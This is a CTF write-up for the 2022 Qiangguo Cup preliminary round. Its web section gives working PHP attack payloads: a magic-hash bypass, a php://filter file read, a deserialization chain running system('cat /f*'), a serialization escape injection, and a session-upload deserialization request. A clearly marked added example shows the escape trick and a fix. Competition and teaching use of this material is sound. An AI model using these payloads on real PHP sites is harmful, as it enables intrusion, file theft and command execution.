2022 强国杯 (Qiangguo Cup) Eastern Division Preliminary Round CTF WriteUp

WriteUp, 2 years ago (2022), admin


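Recruiting

The EDI安全 CTF team regularly takes part in major CTF competitions and is familiar with CTF events.

Everyone is welcome to join EDI so that we can play CTF and improve together.

We are recruiting members for the re, crypto, pwn and misc tracks. If you are interested, please contact us by email at [email protected][email protected] (include your résumé, covering at least your school, personal ID, technical specialties, past competition results, and so on).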


01

Web

1

md5_php
GET /?md5=0e215962017 HTTP/1.1
Host: 39.106.153.217:46975
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

http://39.106.153.217:46975/le.php?file=php://filter/convert.base64-encode/index/resource=flag

2

Command execution
https://www.xiaohongyan.cn/articles/2022/04/27/1651046661350.html

3

Deserialization

<?php
class main{
    // protected property: serialized under the name "\0*\0ClassObj"
    protected $ClassObj;

    function __construct(){
        $this->ClassObj = new evil();
    }
}
// class easy{
// function action(){
// echo "hello Hacker";
// }
// }
class evil{
    // private property: serialized under the name "\0evil\0file"
    private $file= 'system("cat /f*");';
    function action(){
        eval($this->file);
    }
}
$a = new main();
// URL-encode so the NUL bytes in the property names survive in the query string
echo urlencode(serialize($a));

http://101.200.32.152:16798/?a=O%3A4%3A%22main%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00file%22%3Bs%3A18%3A%22system%28%22cat+%2Ff%2A%22%29%3B%22%3B%7D%7D


4

phpti

PHP self-increment

<?php
error_reporting(0);
highlight_string(file_get_contents('sessionti1.php'));
class a{
    public $uname;
    public $password;
    public function __construct($uname,$password){
        $this->uname=$uname;
        $this->password=$password;
    }
    public function __wakeup(){
        if($this->password==='admin')
        {
            highlight_string(file_get_contents('flag.php'));
            include('flag.php');
        }
        else
        {
            echo 'hacker !!!';
        }
    }
}

function filter($string){
    return str_replace('phpinfo()','phpinfo()up',$string);
}

$uname=$_GET["admin"];
$password=123456;
$ser=filter(serialize(new a($uname,$password)));
var_dump($ser);
// $ser=filter(serialize(new a($uname,$password)));
// $test=unserialize($ser);
?>
<!-- O:1:"a":2:{s:5:"uname";s:1:"?";s:8:"password";s:5:"admin";} -->

1=phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()";s:8:"password";s:5:"admin";}

http://39.107.81.36:45787/sessionti1.php?admin=phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()phpinfo()%22;s:8:%22password%22;s:5:%22admin%22;}

https://www.jb51.net/article/241817.htm
https://blog.csdn.net/bmth666/article/details/104737025

<form action="http://39.107.81.36:45787/flag.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" />
</form>

POST /flag.php HTTP/1.1
Host: 39.107.81.36:45787
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:83.1) Gecko/20100101 Firefox/83.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------169043664136240902353881690649
Content-Length: 500
Origin: null
Connection: close
Cookie: PHPSESSID=ufikfl87kj719o80l9nfrhd2fq
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

-----------------------------169043664136240902353881690649
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

123
-----------------------------169043664136240902353881690649
Content-Disposition: form-data; name="file"; filename="|O:5:"admin":1:{s:4:"root";s:36:"print_r(scandir(dirname(__FILE__)));";}"
Content-Type: image/png

‰PNG
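
Why the sessionti1.php payload above uses exactly 15 repetitions, shown as an added example (not code from the original write-up or the challenge): filter() runs after serialize(), so each `phpinfo()` grows by 2 bytes while the `s:<len>` prefix stays fixed, and the 15 repeats absorb the 30-byte injected tail. The class `a` and `filter()` mirror the page's source without its `__wakeup`; `vulnerable_build()`, `safe_build()` and the input are names and values assumed for this illustration.

```php
<?php
// Added illustration; class a and filter() mirror the challenge source above
// (without __wakeup). vulnerable_build(), safe_build() and $input are constructed.
class a {
    public $uname;
    public $password;
    public function __construct($uname, $password) {
        $this->uname = $uname;
        $this->password = $password;
    }
}

// Each 9-byte "phpinfo()" becomes the 11-byte "phpinfo()up".
function filter($string) {
    return str_replace('phpinfo()', 'phpinfo()up', $string);
}

// Vulnerable order: serialize() fixes the s:<len> prefix, then filter() grows
// the bytes behind it, so the declared length no longer covers the whole value.
function vulnerable_build($uname) {
    return filter(serialize(new a($uname, 123456)));
}

// Hardened order: filter the value first, so s:<len> always matches the content.
function safe_build($uname) {
    return serialize(new a(filter($uname), 123456));
}

// Constructed input: the structure to smuggle in, preceded by enough
// "phpinfo()" repeats that the growth (+2 bytes each) equals the tail length.
$tail  = '";s:8:"password";s:5:"admin";}';
$input = str_repeat('phpinfo()', intdiv(strlen($tail), 2)) . $tail;

foreach (['vulnerable_build', 'safe_build'] as $build) {
    $ser = $build($input);
    // '@' hides the trailing-data warning that newer PHP versions emit.
    $obj = @unserialize($ser, ['allowed_classes' => ['a']]);
    printf("%-16s uname is %3d bytes, password = %s\n",
        $build, strlen($obj->uname), var_export($obj->password, true));
}
```

In the vulnerable order `password` comes back as the string `admin`; in the hardened order it stays the integer 123456 and the whole input remains inside `uname`.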

02

Misc

1

Don't Be Misled (不要被迷惑)

Use binwalk to extract the zip, then brute-force the password and decode the result with jjdecode.


2

PCAP file analysis

09.pacapng

Extract flag.zip and 09.png; 09.png gives the zip password. After decrypting:

The CRC field is wrong; change the image height in the file to see the flag.


3

平正开

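Restore the zip; the zip uses pseudo-encryption.

# Undo the byte-wise transform: zero bytes stay zero, any other byte l becomes 0x100 - l.
with open('flag44c099db1.zip', 'rb') as f1, open('12.zip', 'wb') as dd:
    for l in f1.read():
        if l == 0:
            dd.write(bytes([0x0]))
        else:
            dd.write(bytes([0x100 - l]))

Then decode with http://www.hiencode.com/cvencode.html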


03

Re

1

re2
Decompile the exe, then decompile the pyc file.
The flag is produced once the score reaches 1000.
Output the flag directly after score = 0.




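Originally published on the WeChat official account EDI安全: 2022 强国杯 (Qiangguo Cup) Eastern Division Preliminary Round CTF WriteUp

Copyright notice: posted by admin on October 17, 2022 at 4:27 PM.
When reposting, please credit: 2022 强国杯 (Qiangguo Cup) Eastern Division Preliminary Round CTF WriteUp | CTF导航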
